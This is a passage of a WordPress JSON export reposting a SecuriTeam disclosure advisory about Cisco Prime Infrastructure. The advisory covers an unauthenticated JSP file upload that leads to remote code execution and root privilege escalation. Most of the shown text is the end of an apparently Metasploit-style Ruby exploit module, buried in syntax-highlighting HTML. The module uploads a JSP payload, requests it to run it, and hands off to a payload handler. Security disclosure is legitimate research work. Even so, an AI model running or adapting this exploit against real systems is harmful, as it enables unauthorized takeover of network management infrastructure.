class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-165\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">gsub<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-166\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">gsub<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">x0d<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">x0a<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-167\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">gsub<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">x0a<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-168\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-169\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">jsp<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-170\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-171\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-172\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-173\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">exploit<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-174\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">generate_jsp_payload<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-175\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-176\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">upload_payload<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">jsp_payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-177\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-178\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># we land in \/opt\/CSCOlumos, so we don&#8217;t know the apache directory<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-179\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># as it changes between versions&#8230; so leave this commented for now<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-180\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># &#8230; and try to find a good way to clean it later<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-181\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># register_files_for_cleanup(jsp_name)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-182\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-183\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print_status<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;#{peer} &#8211; Executing payload&#8230;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-184\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">send_request_cgi<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-185\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-s\">&#8216;uri&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">normalize_uri<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;TARGETURI&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jsp_name<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-186\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;method&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;GET&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-187\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-188\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-189\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">handler<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-190\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-191\"><span class=\"crayon-st\">end<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0372 seconds] -->  <\/p>\n<p>&nbsp;<\/p>\n<div class=\"printfriendly pf-alignleft\"><a 
href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3723\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 04 Oct 2018 05:12:22 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary Cisco Prime Infrastructure (CPI) contains two vulnerabilities that when exploited allow an unauthenticated attacker to achieve root privileges and execute code remotely. The first vulnerability is a file upload vulnerability that allows the attacker to upload and execute JSP files as the Apache Tomcat user. 
The second vulnerability is a privilege escalation to &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3723\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Cisco Prime Infrastructure File Inclusion and Remote Command Execution to Privileges Escalation<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[14428,11946,11851,10757,12136],"class_list":["post-13520","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-local-file-inclusion","tag-privilege-escalation","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13520","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13520"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13520\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13520"}],"curies":[{"name":"wp","href":"https:\/\
/api.w.org\/{rel}","templated":true}]}}